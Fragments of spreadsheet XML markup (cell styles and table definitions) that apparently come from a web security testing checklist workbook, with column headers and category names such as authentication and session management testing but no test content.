        <color theme="0" tint="-0.499984740745262"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="1" relative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0"/>
        <color auto="1"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor theme="3" tint="0.59999389629810485"/>
        </patternFill>
      </fill>
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="1" relativeIndent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <name val="Calibri"/>
        <scheme val="minor"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor theme="3" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="1" relativeIndent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="10"/>
        <color theme="0" tint="-0.499984740745262"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <alignment horizontal="general" vertical="center" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="9"/>
        <color theme="0" tint="-0.499984740745262"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="1" relative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0"/>
        <color auto="1"/>
        <name val="Arial"/>
        <scheme val="none"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor theme="3" tint="0.59999389629810485"/>
        </patternFill>
      </fill>
      <alignment horizontal="center" vertical="center" textRotation="0" wrapText="1" relative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09B9082-2D1C-4DA8-9A5A-8AEF9F640B44}" name="Table13" displayName="Table13" ref="A2:H17" totalsRowShown="0" headerRowDxfId="195" dataDxfId="196" headerRowCellStyle="Accent1">
  <tableColumns count="8">
    <tableColumn id="1" xr3:uid="{4DBAB2C4-68B9-41E0-B6E4-7FEC4D1E3A54}" name="Test ID" dataDxfId="27"/>
    <tableColumn id="2" xr3:uid="{2EC40F3C-155F-4287-A084-FE4E1FA6366C}" name="Test Name" dataDxfId="26"/>
    <tableColumn id="3" xr3:uid="{6A9C3CB6-21C6-4065-BF1C-8B20993F0D4D}" name="Objective" dataDxfId="25"/>
    <tableColumn id="4" xr3:uid="{11F5883B-40B8-4F62-93A0-B5B9DB29F296}" name="Tools" dataDxfId="24"/>
    <tableColumn id="5" xr3:uid="{54D9A100-B6A7-4AB8-AC74-D5B74C992B94}" name="Methodology Summary" dataDxfId="23"/>
    <tableColumn id="6" xr3:uid="{D05EACCE-4F78-42A7-9D92-4D30C14E462A}" name="Pass/Fail Criteria" dataDxfId="22"/>
    <tableColumn id="7" xr3:uid="{B04A4030-D6E2-498E-9030-272A4AD57309}" name="Status" dataDxfId="21"/>
    <tableColumn id="8" xr3:uid="{92C12E5E-1D7E-48CF-99FD-0535C046C10A}" name="Notes" dataDxfId="20"/>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A860465-785D-48D7-908D-40196B1452DE}" name="Table14" displayName="Table14" ref="A2:H15" totalsRowShown="0" headerRowDxfId="19" dataDxfId="18" headerRowBorderDxfId="193" tableBorderDxfId="194" totalsRowBorderDxfId="192" headerRowCellStyle="Accent1">
  <autoFilter ref="A2:H15" xr:uid="{5A860465-785D-48D7-908D-40196B1452DE}"/>
  <tableColumns count="8">
    <tableColumn id="1" xr3:uid="{E1296169-C570-4D4E-B661-6D70B3AAF075}" name="Test ID" dataDxfId="17"/>
    <tableColumn id="2" xr3:uid="{ADC7825A-61C7-4406-AE54-5A1D6C899802}" name="Test Name" dataDxfId="16"/>
    <tableColumn id="3" xr3:uid="{7E65992C-E4BC-449F-A252-EC12613AFA22}" name="Objective" dataDxfId="15"/>
    <tableColumn id="4" xr3:uid="{2C52D8BA-8CC1-4FCF-A8F5-9C2258EE8892}" name="Tools" dataDxfId="14"/>
    <tableColumn id="5" xr3:uid="{596B3704-600E-42C2-A30A-E2A46AF63EAA}" name="Methodology Summary" dataDxfId="13"/>
    <tableColumn id="6" xr3:uid="{3A554C1C-8FF0-41E7-A145-E79F192AAD2B}" name="Pass/Fail Criteria" dataDxfId="12"/>
    <tableColumn id="7" xr3:uid="{5D30BCA3-1B12-464F-BF38-AEC5988D8665}" name="Status" dataDxfId="11"/>
    <tableColumn id="8" xr3:uid="{A3D9CEF2-6417-4A37-A016-0DB7D0A16F9F}" name="Notes" dataDxfId="10"/>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60963566-E425-415F-B554-A70EEB552B95}" name="Table15" displayName="Table15" ref="A2:H12" totalsRowShown="0" headerRowDxfId="9" dataDxfId="3" headerRowBorderDxfId="190" tableBorderDxfId="191" totalsRowBorderDxfId="189" headerRowCellStyle="Accent1">
  <autoFilter ref="A2:H12" xr:uid="{60963566-E425-415F-B554-A70EEB552B95}"/>
  <tableColumns count="8">
    <tableColumn id="1" xr3:uid="{595669BF-1437-4DFC-BF5E-5ACA9F6E9AE3}" name="Test ID" dataDxfId="2"/>
    <tableColumn id="2" xr3:uid="{97B0C820-D10F-4F82-A846-57D6FE8CB185}" name="Test Name" dataDxfId="0"/>
    <tableColumn id="3" xr3:uid="{9C8CE253-AECC-4224-86EC-F796CE668417}" name="Objective" dataDxfId="1"/>
    <tableColumn id="4" xr3:uid="{35F81294-65AD-413A-9E58-7D96E095F35E}" name="Tools" dataDxfId="8"/>
    <tableColumn id="5" xr3:uid="{19EAFB53-81B1-4EC7-B861-FF685CC16BCC}" name="Methodology Summary" dataDxfId="7"/>
    <tableColumn id="6" xr3:uid="{80486A97-DF2C-4D98-B89F-03A936A5A667}" name="Pass/Fail Criteria" dataDxfId="6"/>
    <tableColumn id="7" xr3:uid="{3BB17DB1-CB28-4A31-A2ED-C68B09063D8B}" name="Status" dataDxfId="5"/>
    <tableColumn id="8" xr3:uid="{10A33537-C394-4E92-A5BD-188C7253B860}" name="Notes" dataDxfId="4"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleMedium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55BE505-202E-4750-91C1-A53A4A5320C4}" name="Table16" displayName="Table16" ref="A2:H14" totalsRowShown="0" headerRowDxfId="183" dataDxfId="184" headerRowBorderDxfId="187" tableBorderDxfId="188" totalsRowBorderDxfId="186" headerRowCellStyle="Accent1">
  <autoFilter ref="A2:H14" xr:uid="{955BE505-202E-4750-91C1-A53A4A5320C4}"/>
  <tableColumns count="8">
    <tableColumn id="1" xr3:uid="{E7E78518-1DD6-454A-B566-7FB0EFEF9C3F}" name="Test ID" dataDxfId="182"/>
    <tableColumn id="2" xr3:uid="{95D50C03-AF5B-4FFA-B062-3E5AB1429E5F}" name="Test Name" dataDxfId="181"/>
    <tableColumn id="3" xr3:uid="{C954AFD7-2F0C-41C5-A93A-BCD6842C835D}" name="Objective" dataDxfId="180"/>
    <tableColumn id="4" xr3:uid="{A0D3941E-49E0-4BDB-97C7-9A31FFD4A22E}" name="Tools" dataDxfId="179"/>
    <tableColumn id="5" xr3:uid="{F70F7BF9-74EC-45C5-A97B-3B49A751E6FB}" name="Methodology Summary" dataDxfId="178"/>
    <tableColumn id="6" xr3:uid="{D6F2FEAB-8A6F-4280-A170-79D47480CC53}" name="Pass/Fail Criteria" dataDxfId="176"/>
    <tableColumn id="7" xr3:uid="{AD6EB1D8-25C6-487A-9D47-63EB92980925}" name="Status" dataDxfId="177"/>
    <tableColumn id="8" xr3:uid="{707ADEED-4E6A-4252-BA9B-313343AC87D0}" name="Notes" dataDxfId="185"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleMedium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AC6053A9-EE1C-4337-8F3D-049F472F7847}" name="Table18" displayName="Table18" ref="A2:H8" totalsRowShown="0" headerRowDxfId="150" dataDxfId="151" headerRowBorderDxfId="161" tableBorderDxfId="162" totalsRowBorderDxfId="160" headerRowCellStyle="Accent1">
  <autoFilter ref="A2:H8" xr:uid="{AC6053A9-EE1C-4337-8F3D-049F472F7847}"/>
  <tableColumns count="8">
    <tableColumn id="1" xr3:uid="{5F972B1C-7E43-48B0-88C8-0AF2D50E2F99}" name="Test ID" dataDxfId="159"/>
    <tableColumn id="2" xr3:uid="{EF520CF9-81E3-41C5-B5CA-D17B42BCCB6B}" name="Test Name" dataDxfId="158"/>
    <tableColumn id="3" xr3:uid="{FAC4413C-6B5C-4E3A-9F73-3F92094CFF08}" name="Objective" dataDxfId="157"/>
    <tableColumn id="4" xr3:uid="{B71D3CCB-D9AD-4F67-B9DB-EEEBC2E57C2E}" name="Tools" dataDxfId="156"/>
    <tableColumn id="5" xr3:uid="{F270174B-7D9C-4AED-9361-0A52539A7811}" name="Methodology Summary" dataDxfId="155"/>
    <tableColumn id="6" xr3:uid="{C4610A1E-D705-45BA-A3B4-20062D78175F}" name="Pass/Fail Criteria" dataDxfId="154"/>
    <tableColumn id="7" xr3:uid="{BE05927E-A410-456C-8E88-DD1CCD82D7A3}" name="Status" dataDxfId="153"/>
    <tableColumn id="8" xr3:uid="{AE2F7A00-C69C-48E1-A879-BE24EAC52138}" name="Notes" dataDxfId="152"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleMedium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EA729B7-156E-449F-AED3-4A1C124C9644}" name="Table17" displayName="Table17" ref="A2:H10" totalsRowShown="0" headerRowDxfId="163" dataDxfId="164" headerRowBorderDxfId="174" tableBorderDxfId="175" totalsRowBorderDxfId="173" headerRowCellStyle="Accent1">
  <autoFilter ref="A2:H10" xr:uid="{7EA729B7-156E-449F-AED3-4A1C124C9644}"/>
  <tableColumns count="8">
    <tableColumn id="1" xr3:uid="{23F800E4-4A3E-4C56-8C46-5A23B7E8712D}" name="Test ID" dataDxfId="172"/>
    <tableColumn id="2" xr3:uid="{CFED48AA-648A-444C-A3D7-BB00D172F84A}" name="Test Name" dataDxfId="171"/>
    <tableColumn id="3" xr3:uid="{3DD9411B-A3D0-41B0-A434-6BE903B68F1E}" name="Objective" dataDxfId="170"/>
    <tableColumn id="4" xr3:uid="{54E98830-DAED-4A6C-8639-768E53A4E7DF}" name="Tools" dataDxfId="169"/>
    <tableColumn id="5" xr3:uid="{A5F50D61-FA2F-48CC-A128-2443861C8507}" name="Methodology Summary" dataDxfId="168"/>
    <tableColumn id="6" xr3:uid="{CF58633C-7875-44D4-B449-2586FC27E02E}" name="Pass/Fail Criteria" dataDxfId="167"/>
    <tableColumn id="7" xr3:uid="{FD4C1AE0-0726-4BF7-9492-5F3B40B2BD29}" name="Status" dataDxfId="166"/>
    <tableColumn id="8" xr3:uid="{E167F6F4-C1E9-4EC6-8A27-76AF69D0BFE1}" name="Notes" dataDxfId="165"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleMedium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D7258FF9-C93A-4C1E-9E5A-93973E72554E}" name="Table19" displayName="Table19" ref="A2:H23" totalsRowShown="0" headerRowDxfId="137" dataDxfId="138" headerRowBorderDxfId="148" tableBorderDxfId="149" totalsRowBorderDxfId="147" headerRowCellStyle="Accent1">
  <autoFilter ref="A2:H23" xr:uid="{D7258FF9-C93A-4C1E-9E5A-93973E72554E}"/>
  <tableColumns count="8">
    <tableColumn id="1" xr3:uid="{90891829-D572-4F08-9953-6A20846BDB3C}" name="Test ID" dataDxfId="146"/>
    <tableColumn id="2" xr3:uid="{03D3B914-0DB6-4717-B634-5687D8768EB2}" name="Test Name" dataDxfId="145"/>
    <tableColumn id="3" xr3:uid="{588741F9-7B82-47C8-AF41-CFADFD754820}" name="Objective" dataDxfId="144"/>
    <tableColumn id="4" xr3:uid="{09B279F1-12AD-4D57-AE19-872EC66E3DA0}" name="Tools" dataDxfId="143"/>
    <tableColumn id="5" xr3:uid="{609CEFA0-5E13-4FB7-BCA2-283AE456B07D}" name="Methodology Summary" dataDxfId="142"/>
    <tableColumn id="6" xr3:uid="{C76E1318-F657-4F01-B86E-AE364587CE01}" name="Pass/Fail Criteria" dataDxfId="141"/>
    <tableColumn id="7" xr3:uid="{52D6AEA3-F918-4C03-97E6-1ECE4BB08E70}" name="Status" dataDxfId="140"/>
    <tableColumn id="8" xr3:uid="{86CE42AE-A0C5-41F2-92CF-1AC09BC770B4}" name="Notes" dataDxfId="139"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleMedium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2A90C1A-B002-4A81-9DB4-CF07011715E7}" name="Table20" displayName="Table20" ref="A2:H3" totalsRowShown="0" headerRowDxfId="80" dataDxfId="81" headerRowBorderDxfId="91" tableBorderDxfId="92" totalsRowBorderDxfId="90" headerRowCellStyle="Accent1">
  <autoFilter ref="A2:H3" xr:uid="{C2A90C1A-B002-4A81-9DB4-CF07011715E7}"/>
  <tableColumns count="8">
    <tableColumn id="1" xr3:uid="{A5ACD235-63FC-42EE-AB5B-D2386EC7B185}" name="Test ID" dataDxfId="89"/>
    <tableColumn id="2" xr3:uid="{52F968CD-6164-4586-AC08-D4644EB29E88}" name="Test Name" dataDxfId="88"/>
    <tableColumn id="3" xr3:uid="{D1BE49F9-2EE5-4B9B-8269-A8EA21A7D687}" name="Objective" dataDxfId="87"/>
    <tableColumn id="4" xr3:uid="{5683C904-1FCB-4DC4-8393-63A3FA1695B7}" name="Tools" dataDxfId="86"/>
    <tableColumn id="5" xr3:uid="{C32E47D8-58BD-4E76-94C2-C824B977E62A}" name="Methodology Summary" dataDxfId="85"/>
    <tableColumn id="6" xr3:uid="{F617D5AB-5ADA-4B9A-AF6B-9F8AD25F1033}" name="Pass/Fail Criteria" dataDxfId="84"/>
    <tableColumn id="7" xr3:uid="{98E9873E-DC98-46E7-9541-5B23384DDC85}" name="Status" dataDxfId="83"/>
    <tableColumn id="8" xr3:uid="{DB8A77AE-E10C-471D-9C53-FDF5FB15F69A}" name="Notes" dataDxfId="82"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleMedium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4FDDA75C-D694-4F7B-BC13-E8B8542723B3}" name="Table21" displayName="Table21" ref="A2:H13" totalsRowShown="0" headerRowDxfId="67" dataDxfId="68" headerRowBorderDxfId="78" tableBorderDxfId="79" totalsRowBorderDxfId="77" headerRowCellStyle="Accent1">
  <autoFilter ref="A2:H13" xr:uid="{4FDDA75C-D694-4F7B-BC13-E8B8542723B3}"/>
  <tableColumns count="8">
    <tableColumn id="1" xr3:uid="{BDAEC090-F7A3-460E-BF5D-49C82F95B889}" name="Test ID" dataDxfId="76"/>
    <tableColumn id="2" xr3:uid="{B3F39252-E9AB-4E49-82ED-E020AA9DBA2E}" name="Test Name" dataDxfId="75"/>
    <tableColumn id="3" xr3:uid="{9DD1D181-43CB-4568-A25F-88F6E29C6934}" name="Objective" dataDxfId="74"/>
    <tableColumn id="4" xr3:uid="{B0B40CE2-139A-4AE7-9EF8-9E70589C4FB7}" name="Tools" dataDxfId="73"/>
    <tableColumn id="5" xr3:uid="{C8965E10-1714-4BFC-AC3E-E0C639C7288D}" name="Methodology Summary" dataDxfId="72"/>
    <tableColumn id="6" xr3:uid="{1C7E2F10-A48C-4A69-839E-A1AFF7851AC4}" name="Pass/Fail Criteria" dataDxfId="71"/>
    <tableColumn id="7" xr3:uid="{03E9740F-1FAE-454A-B6F5-CC1F4DDD057C}" name="Status" dataDxfId="70"/>
    <tableColumn id="8" xr3:uid="{1BC90110-33EE-460A-9243-CD1E5547FE2D}" name="Notes" dataDxfId="69"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleMedium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F8C714E-15D7-4977-8D98-A5BE3EBE06A3}" name="Table22" displayName="Table22" ref="A2:H20" totalsRowShown="0" headerRowDxfId="54" dataDxfId="55" headerRowBorderDxfId="65" tableBorderDxfId="66" totalsRowBorderDxfId="64" headerRowCellStyle="Accent1">
  <autoFilter ref="A2:H20" xr:uid="{8F8C714E-15D7-4977-8D98-A5BE3EBE06A3}"/>
  <tableColumns count="8">
    <tableColumn id="1" xr3:uid="{1E5F7900-15B9-4D86-8327-6FA53075DEC6}" name="Test ID" dataDxfId="63"/>
    <tableColumn id="2" xr3:uid="{35A36AFE-6985-4F54-A843-56EF24C7B358}" name="Test Name" dataDxfId="62"/>
    <tableColumn id="3" xr3:uid="{7572ECE0-9905-4609-BB1C-A075903F7F67}" name="Objective" dataDxfId="61"/>
    <tableColumn id="4" xr3:uid="{186395B1-2FB2-446E-9EF2-65E84574E706}" name="Tools" dataDxfId="60"/>
    <tableColumn id="5" xr3:uid="{253DB62C-A16E-4457-9F52-361364437166}" name="Methodology Summary" dataDxfId="59"/>
    <tableColumn id="6" xr3:uid="{899E1DAD-4CE0-4C62-8C41-5D0C13D0ABA3}" name="Pass/Fail Criteria" dataDxfId="58"/>
    <tableColumn id="7" xr3:uid="{E0284D48-3983-48DB-894C-3E28B83F2527}" name="Status" dataDxfId="57"/>
    <tableColumn id="8" xr3:uid="{3B0F2A55-CF04-489E-AD5A-849CE95C42F2}" name="Notes" dataDxfId="56"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleMedium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F5D78F14-F875-4932-B94F-07DB98E4C835}" name="Table23" displayName="Table23" ref="A2:H10" totalsRowShown="0" headerRowDxfId="41" dataDxfId="42" headerRowBorderDxfId="52" tableBorderDxfId="53" totalsRowBorderDxfId="51" headerRowCellStyle="Accent1">
  <autoFilter ref="A2:H10" xr:uid="{F5D78F14-F875-4932-B94F-07DB98E4C835}"/>
  <tableColumns count="8">
    <tableColumn id="1" xr3:uid="{533722A7-F5F8-457A-8727-E23FEE420553}" name="Test ID" dataDxfId="50"/>
    <tableColumn id="2" xr3:uid="{56941C5D-BAC8-4DEA-A5F0-1551E73F6CCA}" name="Test Name" dataDxfId="49"/>
    <tableColumn id="3" xr3:uid="{08374A27-7FF6-4983-8C36-04884351CFD2}" name="Objective" dataDxfId="48"/>
    <tableColumn id="4" xr3:uid="{049EF04C-9147-4B10-9E4C-DD9778A89BA1}" name="Tools" dataDxfId="47"/>
    <tableColumn id="5" xr3:uid="{50B8A049-C3F7-4A2C-950B-10727DFEC500}" name="Methodology Summary" dataDxfId="46"/>
    <tableColumn id="6" xr3:uid="{F0E5D7FF-9BB8-43E7-BE20-92B4CE63E36F}" name="Pass/Fail Criteria" dataDxfId="45"/>
    <tableColumn id="7" xr3:uid="{22739647-69A5-40C5-9DFD-7A1B4E544F3C}" name="Status" dataDxfId="44"/>
    <tableColumn id="8" xr3:uid="{20E0C922-8B19-49D2-9447-62066B0BB553}" name="Notes" dataDxfId="43"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleMedium6"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1B7C643-F82B-4E7C-85D5-E25CC47E0E23}" name="Table24" displayName="Table24" ref="A2:H10" totalsRowShown="0" headerRowDxfId="28" dataDxfId="29" headerRowBorderDxfId="39" tableBorderDxfId="40" totalsRowBorderDxfId="38" headerRowCellStyle="Accent1">
  <autoFilter ref="A2:H10" xr:uid="{01B7C643-F82B-4E7C-85D5-E25CC47E0E23}"/>
  <tableColumns count="8">
    <tableColumn id="1" xr3:uid="{D007B55B-7408-47D1-A160-587CA32E7FEF}" name="Test ID" dataDxfId="37"/>
    <tableColumn id="2" xr3:uid="{1A70E324-C88B-43AF-8D9D-524E1D4F2B5D}" name="Test Name" dataDxfId="36"/>
    <tableColumn id="3" xr3:uid="{1F5AA54D-1DC3-47DA-8D1E-F3B348CC85C9}" name="Objective" dataDxfId="35"/>
    <tableColumn id="4" xr3:uid="{04F365DD-3068-4072-A391-3AF31782B5E8}" name="Tools" dataDxfId="34"/>
    <tableColumn id="5" xr3:uid="{E315020F-9350-433A-BFF8-150306466044}" name="Methodology Summary" dataDxfId="33"/>
    <tableColumn id="6" xr3:uid="{50DB6FBA-25D6-42BD-9492-8F0DF4005E0B}" name="Pass/Fail Criteria" dataDxfId="32"/>
    <tableColumn id="7" xr3:uid="{2150E86F-7D9B-42B0-8BC4-DB33F39493FF}" name="Status" dataDxfId="31"/>
    <tableColumn id="8" xr3:uid="{6853A285-DA58-4AD7-82E0-8A0450C022D3}" name="Notes" dataDxfId="30"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleMedium6"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4B6FCA-06A2-4050-BA15-DAFE10EE1670}" name="Table1" displayName="Table1" ref="A4:F14" totalsRowShown="0" headerRowDxfId="262">
  <autoFilter ref="A4:F14" xr:uid="{334B6FCA-06A2-4050-BA15-DAFE10EE1670}"/>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{6513BD65-510C-4B1E-BA53-EF0FE06A40D2}" name="Information Gathering" dataDxfId="261"/>
    <tableColumn id="2" xr3:uid="{5FB0442E-A912-42DC-9AF7-B54C99137CAA}" name="Test Name" dataDxfId="260"/>
    <tableColumn id="3" xr3:uid="{66FEA79F-F673-4D5A-9295-82C602667EDC}" name="Description" dataDxfId="259"/>
    <tableColumn id="4" xr3:uid="{803873AC-394A-47B5-B855-851D74CC4FA2}" name="Tools" dataDxfId="258"/>
    <tableColumn id="5" xr3:uid="{414EB4DF-BB0E-4CAD-BE8F-F4F6AA62CF3A}" name="Result" dataDxfId="257"/>
    <tableColumn id="6" xr3:uid="{CF23D3C5-4C80-416A-8B34-F8065166DC39}" name="Remark"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight16"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378B9E4-A709-4ADE-9976-72C5FA14C22F}" name="Table2" displayName="Table2" ref="A16:F24" totalsRowShown="0" headerRowDxfId="256">
  <autoFilter ref="A16:F24" xr:uid="{8378B9E4-A709-4ADE-9976-72C5FA14C22F}"/>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{F1C6AA95-D99E-49FA-9326-525D9E45DAEB}" name="Configuration and Deploy Management Testing" dataDxfId="255"/>
    <tableColumn id="2" xr3:uid="{C70C0141-4CAF-4D32-8274-20105422AA3F}" name="Test Name" dataDxfId="254"/>
    <tableColumn id="3" xr3:uid="{B6B4FA3D-A4B9-4525-8DF4-6522457FCEFE}" name="Description" dataDxfId="253"/>
    <tableColumn id="4" xr3:uid="{3C08A834-4867-4CB2-B287-AC7558A1C350}" name="Tools" dataDxfId="252"/>
    <tableColumn id="5" xr3:uid="{D763586A-24A0-4278-86A8-5709596BEB7C}" name="Result" dataDxfId="251"/>
    <tableColumn id="6" xr3:uid="{30D3D862-8537-4BC7-814C-E2EDD49972F7}" name="Remark"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight16"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E25D92E-DCD0-4D76-9AE7-02C9E192951F}" name="Table3" displayName="Table3" ref="A35:F45" totalsRowShown="0" headerRowDxfId="250">
  <autoFilter ref="A35:F45" xr:uid="{DE25D92E-DCD0-4D76-9AE7-02C9E192951F}"/>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{EE398175-434C-4B2B-AE6F-124CDDEB6607}" name="Authentication Testing" dataDxfId="249"/>
    <tableColumn id="2" xr3:uid="{1C1034B4-599C-419D-9E55-A0AE62F0C4FD}" name="Test Name" dataDxfId="248"/>
    <tableColumn id="3" xr3:uid="{947C8135-7063-4422-8316-AED9F854AC8D}" name="Description" dataDxfId="247"/>
    <tableColumn id="4" xr3:uid="{A72D4A91-E062-4206-997B-948154C858AE}" name="Tools" dataDxfId="246"/>
    <tableColumn id="5" xr3:uid="{C098E885-5607-4EC4-B543-83FA1EB506A4}" name="Result" dataDxfId="245"/>
    <tableColumn id="6" xr3:uid="{93FAD640-8742-45DA-BBDD-EB8BF6FAC34D}" name="Remark"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight16"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0747E1F-DCC7-4459-AFDF-910F3533C3A5}" name="Table4" displayName="Table4" ref="A53:F61" totalsRowShown="0" headerRowDxfId="244">
  <autoFilter ref="A53:F61" xr:uid="{A0747E1F-DCC7-4459-AFDF-910F3533C3A5}"/>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{1BE3FDEA-630D-4E95-A66B-21C8F6639399}" name="Session Management Testing" dataDxfId="243"/>
    <tableColumn id="2" xr3:uid="{A7FA3976-6938-4074-B070-BE40D45627C5}" name="Test Name" dataDxfId="242"/>
    <tableColumn id="3" xr3:uid="{88B755CB-65B0-40DA-906E-D2EA4D0EFFB2}" name="Description" dataDxfId="241"/>
    <tableColumn id="4" xr3:uid="{3A1B5E01-05C0-4134-8281-CBD931EE70B8}" name="Tools" dataDxfId="240"/>
    <tableColumn id="5" xr3:uid="{C549ADB3-EC12-42BB-AB8F-C960D32EEAB2}" name="Result" dataDxfId="239"/>
    <tableColumn id="6" xr3:uid="{F3B1811E-235A-47B6-B766-28C278810391}" name="Remark"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight16"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AF1FCB0-2CA9-4FD9-87BD-A6EE9358EC59}" name="Table5" displayName="Table5" ref="A47:F51" totalsRowShown="0" headerRowDxfId="238">
  <autoFilter ref="A47:F51" xr:uid="{7AF1FCB0-2CA9-4FD9-87BD-A6EE9358EC59}"/>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{5C6790BD-9CDC-4F6D-8BAC-BE47885EC01C}" name="Authorization Testing " dataDxfId="237"/>
    <tableColumn id="2" xr3:uid="{CFB49289-6927-421B-9F6E-054DAAC207F9}" name="Test Name" dataDxfId="236"/>
    <tableColumn id="3" xr3:uid="{B5451BEC-B61D-4D23-9916-29FFCEA1E8F4}" name="Description" dataDxfId="235"/>
    <tableColumn id="4" xr3:uid="{6C393342-DB8F-439F-9F3D-51F770C7CACF}" name="Tools" dataDxfId="234"/>
    <tableColumn id="5" xr3:uid="{99859624-1C1A-44EE-9CAE-84AECAC4AC43}" name="Result" dataDxfId="233"/>
    <tableColumn id="6" xr3:uid="{A8EFFA32-FC68-475C-A49E-2949A2FB05E0}" name="Remark"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight16"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34D408-995A-4AAF-A77C-0DA74018E24B}" name="Table6" displayName="Table6" ref="A101:F110" totalsRowShown="0" headerRowDxfId="232">
  <autoFilter ref="A101:F110" xr:uid="{8F34D408-995A-4AAF-A77C-0DA74018E24B}"/>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{99AC2089-B7F0-4BB2-A281-B03D6F59BE2A}" name="Business logic Testing" dataDxfId="231"/>
    <tableColumn id="2" xr3:uid="{BDECA565-49AE-4DD3-980E-3FE578B2B58A}" name="Test Name" dataDxfId="230"/>
    <tableColumn id="3" xr3:uid="{8E535FF9-50CD-4473-BA3F-6B046DE19EC4}" name="Description" dataDxfId="229"/>
    <tableColumn id="4" xr3:uid="{09D38E65-D5AF-4A50-AAB1-C1DA5D15C17D}" name="Tools" dataDxfId="228"/>
    <tableColumn id="5" xr3:uid="{F0AF972A-8D9F-4C77-88FA-52554F723CCB}" name="Result" dataDxfId="227"/>
    <tableColumn id="6" xr3:uid="{BEDF8413-94B2-4925-B645-B59A66C7CC28}" name="Remark"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight16"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2E53B1E-E935-46D2-A617-A62D35818130}" name="Table9" displayName="Table9" ref="A63:F90" totalsRowShown="0" headerRowDxfId="226">
  <autoFilter ref="A63:F90" xr:uid="{82E53B1E-E935-46D2-A617-A62D35818130}"/>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{A49B1ED6-9278-46C8-8612-3E2761547938}" name="Data Validation Testing" dataDxfId="225"/>
    <tableColumn id="2" xr3:uid="{112198F6-F3B8-4EE7-AF12-44A85BCA0361}" name="Test Name" dataDxfId="224"/>
    <tableColumn id="3" xr3:uid="{BDC2A07D-B9CF-472E-9F4C-662363475670}" name="Description" dataDxfId="223"/>
    <tableColumn id="4" xr3:uid="{657947A1-7285-4C46-B548-B93756CA5194}" name="Tools" dataDxfId="222"/>
    <tableColumn id="5" xr3:uid="{C271684F-FBE3-44AE-B54C-1A4565EF0A96}" name="Result" dataDxfId="221"/>
    <tableColumn id="6" xr3:uid="{ACCDD3D8-FBEA-4885-99C5-972ADBE0FBE3}" name="Remark"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight16"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B1561A0-BB43-4047-B51A-9510B0FA83D9}" name="Table29" displayName="Table29" ref="A26:F33" totalsRowShown="0" headerRowDxfId="220">
  <autoFilter ref="A26:F33" xr:uid="{0B1561A0-BB43-4047-B51A-9510B0FA83D9}"/>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{EB04D99F-B8ED-495C-9C28-C95394BEC8A2}" name="Identity Management Testing" dataDxfId="219"/>
    <tableColumn id="2" xr3:uid="{FE9D88DA-B40E-40C5-826D-4FE008EFB33F}" name="Test Name" dataDxfId="218"/>
    <tableColumn id="3" xr3:uid="{6AC4D1A1-872C-4F6B-B6AC-328B042045AF}" name="Description" dataDxfId="217"/>
    <tableColumn id="4" xr3:uid="{F879D001-23C0-4D61-8064-D0550F0F5135}" name="Tools" dataDxfId="216"/>
    <tableColumn id="5" xr3:uid="{AE17BBA5-53AC-49A9-A16D-BF44E3F47900}" name="Result" dataDxfId="215"/>
    <tableColumn id="6" xr3:uid="{E32A654B-F49B-464A-BA2C-05FA897D2F2D}" name="Remark"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight16"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01436F6-0D67-43FA-B411-80F165534724}" name="Table614" displayName="Table614" ref="A92:F94" totalsRowShown="0" headerRowDxfId="214">
  <autoFilter ref="A92:F94" xr:uid="{E01436F6-0D67-43FA-B411-80F165534724}"/>
  <tableColumns count="6">
